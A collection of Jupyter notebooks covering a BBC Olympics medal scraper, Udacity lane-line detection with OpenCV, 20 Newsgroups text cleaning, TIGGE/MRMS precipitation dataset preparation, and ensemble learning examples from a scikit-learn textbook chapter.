("cat", OneHotEncoder(), cat_attribs),
])
housing_prepared = full_pipeline.fit_transform(housing)
pip install scikit-learn==2.0
```
|
github_jupyter
|
# 2016 Olympics medal count acquisition
In this notebook, we acquire the current medal count from the web.
# 1. List of sports
```
from bs4 import BeautifulSoup
import urllib
r = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports').read()
soup = BeautifulSoup(r,"lxml")
sports_span = soup.findAll("span",{"class","medals-table-by-sport__sport-name"})
sports_names = []
sports_names_format = []
for s in sports_span:
sports_names_format.append(str(s))
sports_names.append(str(s).lower().replace(" ","-")[48:-7])
print sports_names
```
# 2. HTMLs for each sport's medal table
```
# Save html for each sport
htmls = {}
for s in sports_names:
htmls[s] = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports/'+s+'#'+s).read()
# Find table html for each sport
thtmls = {}
for s in sports_names:
soupsp = BeautifulSoup(htmls[s],"lxml")
thtmls[s] = soupsp.findAll("table",{"class","medals-table-by-sport__countries_table"})
```
# 3. Scrape medals for each country and sport
```
# For every sport, scrape medal data
import re
medal_names = ['gold','silver','bronze']
medals = {}
sports_countries = {}
all_countries_format = []
for s in sports_names:
print s
medals[s] = {}
h = str(thtmls[s])
if not thtmls[s]:
print 'no medals yet'
else:
# Find countries of interest
pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\""
pmatch = re.finditer(pattern, h)
countries = []
for i,match in enumerate(pmatch):
country = h[int(match.end()):int(match.end())+200].rsplit('"')[0]
all_countries_format.append(country)
countries.append(country.lower().replace(" ","-"))
sports_countries[s] = countries
for c in sports_countries[s]:
if c == 'great-britain-&-n.-ireland':
ci1 = 'great-britain-and-northern-ireland'
medals[s][c] = {}
for m in medal_names:
pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\".{,800}" + m + ".{,150}" + ci1 + "\">"
gendermatch = re.finditer(pattern, h)
for i,match in enumerate(gendermatch):
medals[s][c][m] = int(h[int(match.end()):int(match.end())+3])
else:
ci = c
medals[s][ci] = {}
for m in medal_names:
pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\".{,500}" + m + ".{,150}" + ci + "\">"
gendermatch = re.finditer(pattern, h)
for i,match in enumerate(gendermatch):
medals[s][ci][m] = int(h[int(match.end()):int(match.end())+3])
print medals[s]
```
# Create dataframe of medals
```
import numpy as np
all_countries_format = list(np.unique(all_countries_format))
all_countries_format.remove('Great Britain & N. Ireland')
all_countries_format.append('Great Britain')
all_countries_format_list = list(np.unique(all_countries_format))
import pandas as pd
# Create an empty dataframe
columns = ['country','sport','medal','N']
df = pd.DataFrame(columns=columns)
# Identify all countries with at least 1 medal
countries_list = list(set(reduce(lambda x,y: x+y,sports_countries.values())))
countries_list = sorted(countries_list)
# Fill dataframe
for s in sports_names:
if thtmls[s]:
for i,c in enumerate(countries_list):
ci = all_countries_format_list[i]
for m in medal_names:
if c in sports_countries[s]:
rowtemp = [ci, s, m, medals[s][c][m]]
else:
rowtemp = [ci, s, m, 0]
dftemp = pd.DataFrame([rowtemp], columns=columns)
df =df.append(dftemp)
```
# Save dataframe
```
df.to_csv('now_medals.csv')
```
|
github_jupyter
|
# Self-Driving Car Engineer Nanodegree
## Project: **Finding Lane Lines on the Road**
***
In this project, you will use the tools you learned about in the lesson to identify lane lines on the road. You can develop your pipeline on a series of individual images, and later apply the result to a video stream (really just a series of images). Check out the video clip "raw-lines-example.mp4" (also contained in this repository) to see what the output should look like after using the helper functions below.
Once you have a result that looks roughly like "raw-lines-example.mp4", you'll need to get creative and try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4". Ultimately, you would like to draw just one line for the left side of the lane, and one for the right.
In addition to implementing code, there is a brief writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) that can be used to guide the writing process. Completing both the code in the Ipython notebook and the writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/322/view) for this project.
---
Let's have a look at our first image called 'test_images/solidWhiteRight.jpg'. Run the 2 cells below (hit Shift-Enter or the "play" button above) to display the image.
**Note: If, at any point, you encounter frozen display windows or other confounding issues, you can always start again with a clean slate by going to the "Kernel" menu above and selecting "Restart & Clear Output".**
---
**The tools you have are color selection, region of interest selection, grayscaling, Gaussian smoothing, Canny Edge Detection and Hough Tranform line detection. You are also free to explore and try other techniques that were not presented in the lesson. Your goal is piece together a pipeline to detect the line segments in the image, then average/extrapolate them and draw them onto the image for display (as below). Once you have a working pipeline, try it out on the video stream below.**
---
<figure>
<img src="examples/line-segments-example.jpg" width="380" alt="Combined Image" />
<figcaption>
<p></p>
<p style="text-align: center;"> Your output should look something like this (above) after detecting line segments using the helper functions below </p>
</figcaption>
</figure>
<p></p>
<figure>
<img src="examples/laneLines_thirdPass.jpg" width="380" alt="Combined Image" />
<figcaption>
<p></p>
<p style="text-align: center;"> Your goal is to connect/average/extrapolate line segments to get output like this</p>
</figcaption>
</figure>
**Run the cell below to import some packages. If you get an `import error` for a package you've already installed, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
## Import Packages
```
#importing some useful packages
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import math
import pdb, os
from collections.abc import Mapping
%matplotlib inline
```
## Read in an Image
```
#reading in an image
image = mpimg.imread('test_images/solidWhiteRight.jpg')
#printing out some stats and plotting
print('This image is:', type(image), 'with dimensions:', image.shape)
plt.imshow(image) # if you wanted to show a single color channel image called 'gray', for example, call as plt.imshow(gray, cmap='gray')
```
## Ideas for Lane Detection Pipeline
**Some OpenCV functions (beyond those introduced in the lesson) that might be useful for this project are:**
`cv2.inRange()` for color selection
`cv2.fillPoly()` for regions selection
`cv2.line()` to draw lines on an image given endpoints
`cv2.addWeighted()` to coadd / overlay two images
`cv2.cvtColor()` to grayscale or change color
`cv2.imwrite()` to output images to file
`cv2.bitwise_and()` to apply a mask to an image
**Check out the OpenCV documentation to learn about these and discover even more awesome functionality!**
```
# Helper Functions
def show_img(img_dict):
if not isinstance(img_dict, Mapping):
plt.imshow(img_dict)
return
elif len(img_dict) == 1:
plt.imshow(img_dict.values[0])
return
else:
col = 3
row = 1
values_list = list(img_dict.values())
fig, axes = plt.subplots(row, col, figsize = (16, 8))
fig.subplots_adjust(hspace = 0.1, wspace = 0.2)
axes.ravel()
axes[0].imshow(values_list[0])
axes[1].imshow(values_list[1])
axes[2].imshow(values_list[2])
def grayscale(img):
return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
def canny(img, low_threshold, high_threshold):
return cv2.Canny(img, low_threshold, high_threshold)
def gaussian_blur(img, kernel_size):
return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)
def region_of_interest(img, vertices):
"""
Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
`vertices` should be a numpy array of integer points.
"""
#defining a blank mask to start with
mask = np.zeros_like(img)
#defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
#filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
#returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap, default):
"""
`img` should be the output of a Canny transform.
Returns an image with hough lines drawn.
"""
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
if default:
draw_default_lines(line_img, lines)
else:
draw_lines(line_img, lines)
return line_img
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., γ=0.):
"""
`img` is the output of the hough_lines(), An image with lines drawn on it.
Should be a blank image (all black) with lines drawn on it.
`initial_img` should be the image before any processing.
The result image is computed as follows:
initial_img * α + img * β + γ
NOTE: initial_img and img must be the same shape!
"""
return cv2.addWeighted(initial_img, α, img, β, γ)
def draw_default_lines(img, lines, color=[255, 0, 0], thickness=5):
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def draw_lines(img, lines, color=[255, 0, 0], thickness=10):
"""
This function draws `lines` with `color` and `thickness`.
Lines are drawn on the image inplace (mutates the image).
If you want to make the lines semi-transparent, think about combining
this function with the weighted_img() function below
"""
# Track gradient and intercept of left and right lane
left_slope = []
left_intercept = []
left_y = []
right_slope = []
right_intercept = []
right_y = []
for line in lines:
for x1,y1,x2,y2 in line:
slope = (y2-y1)/(x2-x1)
intercept = y2 - (slope*x2)
# right lane
if slope > 0.0 and slope < math.inf and abs(slope) > 0.3:
right_slope.append(slope)
right_intercept.append(intercept)
right_y.append(y1)
right_y.append(y2)
# left lane
elif slope < 0.0 and slope > -math.inf and abs(slope) > 0.3:
left_slope.append(slope)
left_intercept.append(intercept)
left_y.append(y1)
left_y.append(y2)
y_min = min(min(left_y), min(right_y)) + 40
y_max = img.shape[0]
l_m = np.mean(left_slope)
l_c = np.mean(left_intercept)
r_m = np.mean(right_slope)
r_c = np.mean(right_intercept)
l_x_max = int((y_max - l_c)/l_m)
l_x_min = int((y_min - l_c)/l_m)
r_x_max = int((y_max - r_c)/r_m)
r_x_min = int((y_min - r_c)/r_m)
#pdb.set_trace()
cv2.line(img, (l_x_max, y_max),(l_x_min, y_min), color, thickness)
cv2.line(img, (r_x_max, y_max),(r_x_min, y_min), color, thickness)
```
## Build a Lane Finding Pipeline
Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.
Try tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.
```
# This cell creates a dictionary of all of the images in 'test_images' folder
def get_images(IMG_PATH = None):
if IMG_PATH == None:
test_imgs = os.listdir("test_images/")
IMG_PATH = "test_images/"
else:
test_imgs = os.listdir(IMG_PATH)
# create an array that contains all test images
img_dict = {}
for image in test_imgs:
img_dict[image] = mpimg.imread(os.path.join(IMG_PATH, image))
return img_dict
# outputs lanes for all images in image dictionary
def interpolate(lanes, img):
# Interpolating lines
result = weighted_img(lanes, img)
return result
def get_lanes(img_dict, default = False):
if isinstance(img_dict, Mapping):
for image in img_dict.keys():
test_img = img_dict[image]
# Converting to grayscale
gray_img = grayscale(test_img)
blur_img = gaussian_blur(gray_img, kernel_size = 3)
# Computing Edges
edges = canny(blur_img, low_threshold = 75, high_threshold = 150)
# Extracting Region of Interest
points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)
ROI = region_of_interest(edges, [points])
# Performing Hough Transform and draw lanes
lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)
if default:
img_dict[image] = lanes
else:
res = interpolate(lanes, test_img)
img_dict[image] = res
return img_dict
# from video frames
else:
gray_img = grayscale(img_dict)
blur_img = gaussian_blur(gray_img, kernel_size = 3)
# Computing Edges
edges = canny(blur_img, low_threshold = 75, high_threshold = 150)
# Extracting Region of Interest
points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)
ROI = region_of_interest(edges, [points])
# Performing Hough Transform and draw lanes
lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)
res = interpolate(lanes, img_dict)
return res
img_dict = get_images()
show_img(img_dict)
default_lanes = get_lanes(img_dict, True)
show_img(default_lanes)
img_dict = get_images()
final_output = get_lanes(img_dict)
show_img(final_output)
# This block will automatically compute and save the lanes to the folder 'test_images_output'
def compute_test_images(img_dict):
# compute the lanes for all test_images
lanes_dict = get_lanes(img_dict)
# save outputs to 'test_images_output'
for image in lanes_dict.keys():
PATH = 'test_images_output/'
mpimg.imsave(os.path.join(PATH, image), img_dict[image])
compute_test_images(img_dict)
```
## Test on Videos
You know what's cooler than drawing lanes over images? Drawing lanes over video!
We can test our solution on two provided videos:
`solidWhiteRight.mp4`
`solidYellowLeft.mp4`
**Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
**If you get an error that looks like this:**
```
NeedDownloadError: Need ffmpeg exe.
You can download it by calling:
imageio.plugins.ffmpeg.download()
```
**Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**
```
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
def process_image(image):
# NOTE: The output you return should be a color image (3 channel) for processing video below
# TODO: put your pipeline here,
# you should return the final output (image where lines are drawn on lanes)
result = get_lanes(image)
return result
```
Let's try the one with the solid white lane on the right first ...
```
white_output = 'test_videos_output/solidWhiteRight.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!
%time white_clip.write_videofile(white_output, audio=False)
```
Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.
```
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(white_output))
```
## Improve the draw_lines() function
**At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4".**
**Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line over the right lane line. The lines should start from the bottom of the image and extend out to the top of the region of interest.**
Now for the one with the solid yellow lane on the left. This one's more tricky!
```
yellow_output = 'test_videos_output/solidYellowLeft.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4').subclip(0,5)
clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4')
yellow_clip = clip2.fl_image(process_image)
%time yellow_clip.write_videofile(yellow_output, audio=False)
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(yellow_output))
```
## Writeup and Submission
If you're satisfied with your video outputs, it's time to make the report writeup in a pdf or markdown file. Once you have this Ipython notebook ready along with the writeup, it's time to submit for review! Here is a [link](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) to the writeup template file.
## Optional Challenge
Try your lane finding pipeline on the video below. Does it still work? Can you figure out a way to make it more robust? If you're up for the challenge, modify your pipeline so it works with this video and submit it along with the rest of your project!
```
challenge_output = 'test_videos_output/challenge.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip3 = VideoFileClip('test_videos/challenge.mp4').subclip(0,5)
clip3 = VideoFileClip('test_videos/challenge.mp4')
challenge_clip = clip3.fl_image(process_image)
%time challenge_clip.write_videofile(challenge_output, audio=False)
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(challenge_output))
```
|
github_jupyter
|
```
import os
import sys
import pandas as pd
import re
# pd.set_option('display.max_colwidth', -1)
```
Read data and Spilit into texts and Labels
```
BASE_DIR = ''
GLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')
TEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroups')
# This code from http#s://www.kaggle.com/mansijharia with some edit
# May take a few time
texts = []
labels_index = {}
labels = []
for name in sorted(os.listdir((BASE_DIR+'20_newsgroups'))):
path = os.path.join(BASE_DIR,'20_newsgroups', name)
if os.path.isdir(path):
label_id = len(labels_index)
labels_index[name] = label_id
for fname in sorted(os.listdir(path)):
if fname.isdigit():
fpath = os.path.join(path, fname)
args = {} if sys.version_info < (3,) else {'encoding': 'latin-1'}
with open(fpath, **args) as f:
t = f.read()
#Skip the matadata at 1st pragraph.
i = t.find('\n\n')
if 0 < i:
t = t[i:]
texts.append(t)
labels.append(label_id)
```
print('Found %s texts.' % len(texts))
print('Found %s label.' % len(labels))
dict(labels_index.items())
- First remove the matadata by remove the frisr pragraph
- Some matadata contian two pragraphs we will with the expration
```
# for i in range(0,len(texts)):
# match = re.search(r'([\w\.-]+)@([\w\.-]+)', texts[i])
# if texts[i]!= None:
# print(match)# just to show result
# #so long output
#no need
for i in range(0,len(texts)):
texts[i]= texts[i].strip() #To remove spaces from the beginning and the end of a string
```
# all these step will oreder and put it on the clwaning mathod on the process_data.py file.
#### trye the i in (0,5,7644,5432, 567)
```
#just one sample to show the work
# you can change the value of i
i=0
print('before:',texts[i])
print('the length is',len(texts[i]))
texts[i]= texts[i].strip() #To remove spaces from the beginning and the end
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\=+','', texts[i])#To remove any == characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\|+','', texts[i])#To remove any | characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\(\)+','', texts[i])#To remove any () empty parentheses
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\[\]+','', texts[i])#To remove any [] characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("[<>]", " ",texts[i])#To remove < and > characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('([\w\.-]+)@([\w\.-]+)','', texts[i])#To remove any emails
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub(r"/*\\*/*",'', texts[i])#To remove \/ characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub('\^+','', texts[i])#To remove ^ characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("[__]+", " ", texts[i])#To remove lines
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub('--+', ' ',texts[i])#To remove multiple spaces
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(r'\~\~+','', texts[i])#To remove any == characters
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] = re.sub("\n", " ", texts[i])#To remove lines
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub('\t', ' ',texts[i])#To remove multiple spaces
print('after:',texts[i])
print('the length is',len(texts[i]))
texts[i] =re.sub(' +', ' ',texts[i])#To remove multiple spaces
print('after:',texts[i])
print('the length is',len(texts[i]))
```
## Note the change the order of the these stpe will change the result ^
# I think need to remove the long word and spastic but this step will be in the tokenize process
```
####################### Dosen't work #######################
# match=re.match('Version: ', texts[1])
# if match:
# index = match.start()
# # print(texts[0:index])
# texts[i]=texts[0:index]
#
```
|
github_jupyter
|
```
import torch
from torch.nn import functional as F
from torch import nn
from pytorch_lightning.core.lightning import LightningModule
import pytorch_lightning as pl
import torch.optim as optim
import torchvision
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from src.models import *
from src.dataloader import *
from src.utils import *
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
import pickle
import json
```
## Train and Val
```
data_dir = '/home/jupyter/data/'
args = {'tigge_dir':data_dir + f'tigge/32km/',
'tigge_vars':['total_precipitation_ens10','total_column_water', '2m_temperature', 'convective_available_potential_energy', 'convective_inhibition'],
'mrms_dir':data_dir + f'mrms/4km/RadarOnly_QPE_06H/',
'rq_fn':data_dir + f'mrms/4km/RadarQuality.nc',
# 'const_fn':data_dir + 'tigge/32km/constants.nc',
# 'const_vars':['orog', 'lsm'],
'data_period':('2018-01', '2019-12'),
'val_days':1,
'split':'train',
# 'pure_sr_ratio':8,
'tp_log':0.01,
'scale':True,
'ensemble_mode':'stack_by_variable',
'pad_tigge':15,
'pad_tigge_channel': True,
'idx_stride': 8
}
save_dir = '/home/jupyter/data/data_patches/'
# dataset_name = 'ensemble_tp_x10_added_vars_TCW-T-CAPE-CIN_log_trans_padded_15_channel'
ds_train = TiggeMRMSDataset(**args)
# pickle.dump(args, open(save_dir+'train/configs/dataset_args.pkl', 'wb'))
#save_images(ds_train, save_dir, 'train')
pickle.dump(ds_train, open(data_dir + f"saved_datasets/traindataset_{dataset_name}.pkl", "wb"))
pickle.dump(args, open(data_dir + f"saved_datasets/traindataset_{dataset_name}_args.pkl", "wb"))
val_args = args
val_args['maxs'] = ds_train.maxs
val_args['mins'] = ds_train.mins
val_args['split'] = 'valid'
#ds_valid = TiggeMRMSDataset(**val_args)
pickle.dump(val_args, open(save_dir+'valid/configs/dataset_args.pkl', 'wb'))
len(ds_valid)
save_images(ds_valid, save_dir, 'valid')
#pickle.dump(ds_valid, open(data_dir + f"saved_datasets/validdataset_{dataset_name}.pkl", "wb"))
#pickle.dump(val_args, open(data_dir + f"saved_datasets/validdataset_{dataset_name}_args.pkl", "wb"))
val_args = pickle.load(open('/home/jupyter/data/data_patches/valid/configs/dataset_args.pkl', 'rb'))
test_args = args
test_args['href_dir'] = data_dir + 'hrefv2/4km/total_precipitation/2020*.nc'
test_args['maxs'] = val_args['maxs']
test_args['mins'] = val_args['mins']
test_args.pop('val_days')
test_args.pop('split')
test_args['first_days'] = 5
test_args['data_period'] = ('2020-01', '2020-12')
# test_dataset_name = dataset_name + f"_first_days_{test_args['first_days']}"
ds_test = TiggeMRMSHREFDataset(**test_args)
save_images(ds_test, save_dir, 'test')
pickle.dump(test_args, open(save_dir+'test/configs/dataset_args.pkl', 'wb'))
len(ds_test)
pickle.dump(ds_test, open(data_dir + f"saved_datasets/testdataset_{test_dataset_name}.pkl", "wb"))
pickle.dump(test_args, open(data_dir + f"saved_datasets/testdataset_{test_dataset_name}_args.pkl", "wb"))
print("check")
```
|
github_jupyter
|
**Chapter 7 – Ensemble Learning and Random Forests**
_This notebook contains all the sample code and solutions to the exercises in chapter 7._
<table align="left">
<td>
<a target="_blank" href="https://colab.research.google.com/github/ageron/handson-ml2/blob/master/07_ensemble_learning_and_random_forests.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
</table>
# Setup
First, let's import a few common modules, ensure MatplotLib plots figures inline and prepare a function to save the figures. We also check that Python 3.5 or later is installed (although Python 2.x may work, it is deprecated so we strongly recommend you use Python 3 instead), as well as Scikit-Learn ≥0.20.
```
# Python ≥3.5 is required
import sys
assert sys.version_info >= (3, 5)
# Scikit-Learn ≥0.20 is required
import sklearn
assert sklearn.__version__ >= "0.20"
# Common imports
import numpy as np
import os
# to make this notebook's output stable across runs
np.random.seed(42)
# To plot pretty figures
%matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "ensembles"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
os.makedirs(IMAGES_PATH, exist_ok=True)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
print("Saving figure", fig_id)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
```
# Voting classifiers
```
heads_proba = 0.51
coin_tosses = (np.random.rand(10000, 10) < heads_proba).astype(np.int32)
cumulative_heads_ratio = np.cumsum(coin_tosses, axis=0) / np.arange(1, 10001).reshape(-1, 1)
plt.figure(figsize=(8,3.5))
plt.plot(cumulative_heads_ratio)
plt.plot([0, 10000], [0.51, 0.51], "k--", linewidth=2, label="51%")
plt.plot([0, 10000], [0.5, 0.5], "k-", label="50%")
plt.xlabel("Number of coin tosses")
plt.ylabel("Heads ratio")
plt.legend(loc="lower right")
plt.axis([0, 10000, 0.42, 0.58])
save_fig("law_of_large_numbers_plot")
plt.show()
from sklearn.model_selection import train_test_split
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=500, noise=0.30, random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
```
**Note**: to be future-proof, we set `solver="lbfgs"`, `n_estimators=100`, and `gamma="scale"` since these will be the default values in upcoming Scikit-Learn versions.
```
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
log_clf = LogisticRegression(solver="lbfgs", random_state=42)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
svm_clf = SVC(gamma="scale", random_state=42)
voting_clf = VotingClassifier(
estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],
voting='hard')
voting_clf.fit(X_train, y_train)
from sklearn.metrics import accuracy_score
for clf in (log_clf, rnd_clf, svm_clf, voting_clf):
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print(clf.__class__.__name__, accuracy_score(y_test, y_pred))
```
Soft voting:
```
log_clf = LogisticRegression(solver="lbfgs", random_state=42)
rnd_clf = RandomForestClassifier(n_estimators=100, random_state=42)
svm_clf = SVC(gamma="scale", probability=True, random_state=42)
voting_clf = VotingClassifier(
estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],
voting='soft')
voting_clf.fit(X_train, y_train)
from sklearn.metrics import accuracy_score
for clf in (log_clf, rnd_clf, svm_clf, voting_clf):
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print(clf.__class__.__name__, accuracy_score(y_test, y_pred))
```
# Bagging ensembles
```
from sklearn.ensemble import BaggingClassifier
from sklearn.tree import DecisionTreeClassifier
bag_clf = BaggingClassifier(
DecisionTreeClassifier(random_state=42), n_estimators=500,
max_samples=100, bootstrap=True, random_state=42)
bag_clf.fit(X_train, y_train)
y_pred = bag_clf.predict(X_test)
from sklearn.metrics import accuracy_score
print(accuracy_score(y_test, y_pred))
tree_clf = DecisionTreeClassifier(random_state=42)
tree_clf.fit(X_train, y_train)
y_pred_tree = tree_clf.predict(X_test)
print(accuracy_score(y_test, y_pred_tree))
from matplotlib.colors import ListedColormap
def plot_decision_boundary(clf, X, y, axes=[-1.5, 2.45, -1, 1.5], alpha=0.5, contour=True):
x1s = np.linspace(axes[0], axes[1], 100)
x2s = np.linspace(axes[2], axes[3], 100)
x1, x2 = np.meshgrid(x1s, x2s)
X_new = np.c_[x1.ravel(), x2.ravel()]
y_pred = clf.predict(X_new).reshape(x1.shape)
custom_cmap = ListedColormap(['#fafab0','#9898ff','#a0faa0'])
plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)
if contour:
custom_cmap2 = ListedColormap(['#7d7d58','#4c4c7f','#507d50'])
plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "yo", alpha=alpha)
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "bs", alpha=alpha)
plt.axis(axes)
plt.xlabel(r"$x_1$", fontsize=18)
plt.ylabel(r"$x_2$", fontsize=18, rotation=0)
fix, axes = plt.subplots(ncols=2, figsize=(10,4), sharey=True)
plt.sca(axes[0])
plot_decision_boundary(tree_clf, X, y)
plt.title("Decision Tree", fontsize=14)
plt.sca(axes[1])
plot_decision_boundary(bag_clf, X, y)
plt.title("Decision Trees with Bagging", fontsize=14)
plt.ylabel("")
save_fig("decision_tree_without_and_with_bagging_plot")
plt.show()
```
# Random Forests
```
bag_clf = BaggingClassifier(
DecisionTreeClassifier(splitter="random", max_leaf_nodes=16, random_state=42),
n_estimators=500, max_samples=1.0, bootstrap=True, random_state=42)
bag_clf.fit(X_train, y_train)
y_pred = bag_clf.predict(X_test)
from sklearn.ensemble import RandomForestClassifier
rnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, random_state=42)
rnd_clf.fit(X_train, y_train)
y_pred_rf = rnd_clf.predict(X_test)
np.sum(y_pred == y_pred_rf) / len(y_pred) # almost identical predictions
from sklearn.datasets import load_iris
iris = load_iris()
rnd_clf = RandomForestClassifier(n_estimators=500, random_state=42)
rnd_clf.fit(iris["data"], iris["target"])
for name, score in zip(iris["feature_names"], rnd_clf.feature_importances_):
print(name, score)
rnd_clf.feature_importances_
plt.figure(figsize=(6, 4))
for i in range(15):
tree_clf = DecisionTreeClassifier(max_leaf_nodes=16, random_state=42 + i)
indices_with_replacement = np.random.randint(0, len(X_train), len(X_train))
tree_clf.fit(X[indices_with_replacement], y[indices_with_replacement])
plot_decision_boundary(tree_clf, X, y, axes=[-1.5, 2.45, -1, 1.5], alpha=0.02, contour=False)
plt.show()
```
## Out-of-Bag evaluation
```
bag_clf = BaggingClassifier(
DecisionTreeClassifier(random_state=42), n_estimators=500,
bootstrap=True, oob_score=True, random_state=40)
bag_clf.fit(X_train, y_train)
bag_clf.oob_score_
bag_clf.oob_decision_function_
from sklearn.metrics import accuracy_score
y_pred = bag_clf.predict(X_test)
accuracy_score(y_test, y_pred)
```
## Feature importance
```
from sklearn.datasets import fetch_openml
